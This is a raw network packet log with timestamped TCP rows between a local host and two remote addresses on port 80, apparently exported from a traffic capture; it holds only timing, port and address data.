Dec 14, 2024 12:56:32.745204926 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.862966061 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.863032103 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.863115072 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.863177061 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.863564968 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.863616943 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.863670111 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.863723040 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.864768982 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.864828110 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.864901066 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.864955902 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.865955114 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.866008043 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.866020918 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.866070032 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.867578983 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.867631912 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.867722988 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.867779970 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.868896008 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.868952990 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.869040966 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.869096994 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.870368958 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.870425940 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.870512962 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.870565891 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.871498108 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.871556044 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.871613979 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.871669054 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.872567892 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.872622013 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.872631073 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.872675896 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.873562098 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.873611927 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.873687983 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.873735905 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.874506950 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.874576092 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.874634027 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.874686003 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.875531912 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.875588894 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.875663042 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.875719070 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.876715899 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.876773119 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.876816034 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.876868963 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.877733946 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.877784967 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.877859116 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.877907991 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.878914118 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.878972054 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.879036903 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.879091024 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.880101919 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.880156040 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.880230904 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.880285978 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.881299019 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.881351948 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.881557941 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.881604910 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.882580996 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.882637024 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.882639885 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.882688046 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.883857012 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.883892059 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.883919001 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.883949041 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.884854078 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.884917021 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.884993076 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.885049105 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.886065960 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.886123896 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.886187077 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.886234999 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.887347937 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.887401104 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.887411118 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.887454033 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.888556957 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.888608932 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.888673067 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.888720036 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.889641047 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.889748096 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.889805079 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.889862061 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.890932083 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.890986919 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.891073942 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.891129017 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.892047882 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.892116070 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.892211914 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.892261028 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.893163919 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.893222094 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.893274069 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.893330097 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.894325972 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.894376040 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.894448996 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.894505978 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.895556927 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.895621061 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.895742893 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.895797014 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.896707058 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.896768093 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.896843910 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.896893024 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.898041964 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.898097038 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.898184061 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.898232937 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.899205923 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.899269104 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.899293900 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.899367094 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.900304079 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.900365114 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.900429964 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.900484085 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.901443958 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.901499033 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.901586056 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.901645899 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.902657032 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.902714968 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.902753115 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.902811050 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.903826952 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.903877974 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.903953075 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.904010057 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.905061007 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.905116081 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.905129910 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.905177116 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.906207085 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.906260967 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.906454086 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.906510115 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.907378912 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.907435894 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.907607079 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.907661915 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.908546925 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.908602953 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.908705950 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.908771038 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.909764051 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.909823895 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.909944057 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.910001993 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.910998106 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.911034107 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.911061049 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.911092997 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.912287951 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.912350893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.912422895 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.912475109 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.913454056 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.913507938 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.913510084 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.913556099 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.914515972 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.914568901 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.914616108 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.914669037 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.915858030 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.915894985 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.915910959 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.915944099 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.917001009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.917057991 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.917119026 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.917166948 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.918096066 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.918147087 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.918219090 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.918267012 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.919292927 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.919353008 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.919430017 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.919487953 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.920469999 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.920519114 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.920617104 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.920665979 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.921677113 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.921736002 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.921897888 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.921950102 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.922794104 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.922849894 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.923019886 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.923075914 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.924041986 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.924099922 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.924173117 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.924218893 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.925146103 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:32.925204992 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:32.959790945 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:32.959861994 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:32.962894917 CET	49834	80	192.168.2.4	185.215.113.206
Dec 14, 2024 12:56:33.055051088 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.055129051 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.055191040 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.055244923 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.055619001 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.055682898 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.055762053 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.055814981 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.056734085 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.056787968 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.057198048 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.057251930 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.057305098 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.057353973 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.058403969 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.058485031 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.058515072 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.058571100 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.059531927 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.059633017 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.059720039 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.059778929 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.060740948 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.060797930 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.060857058 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.060909033 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.061902046 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.061954975 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.062025070 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.062083006 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.063061953 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.063127041 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.063150883 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.063205957 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.064265966 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.064325094 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.064431906 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.064488888 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.065466881 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.065522909 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.065524101 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.065576077 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.066613913 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.066672087 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.066728115 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.066781044 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.068728924 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.068792105 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.069041967 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.069097042 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.069209099 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.069245100 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.069257975 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.069293022 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.070319891 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.070379972 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.070477009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.070532084 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.071403027 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.071465015 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.071537018 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.071588993 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.072637081 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.072695017 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.072828054 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.072885990 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.073707104 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.073760033 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.073827982 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.073875904 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.074831009 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.074897051 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.074982882 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.075043917 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.076044083 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.076105118 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.076169014 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.076219082 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.077245951 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.077307940 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.077346087 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.077403069 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.077436924 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.078396082 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.078459024 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.078499079 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.078557968 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.079592943 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.079644918 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.079725981 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.079776049 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.080740929 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.080801964 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.080859900 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.080914021 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.081957102 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.082014084 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.082086086 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.082139969 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.082628012 CET	80	49834	185.215.113.206	192.168.2.4
Dec 14, 2024 12:56:33.083108902 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.083164930 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.083209991 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.083266973 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.084300995 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.084355116 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.084366083 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.084402084 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.085448980 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.085508108 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.085604906 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.085661888 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.086673975 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.086730957 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.086786985 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.086841106 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.087879896 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.087937117 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.087987900 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.088044882 CET	49827	80	192.168.2.4	185.215.113.16
Dec 14, 2024 12:56:33.088953972 CET	80	49827	185.215.113.16	192.168.2.4
Dec 14, 2024 12:56:33.089008093 CET	49827	80	192.168.2.4	185.215.113.16
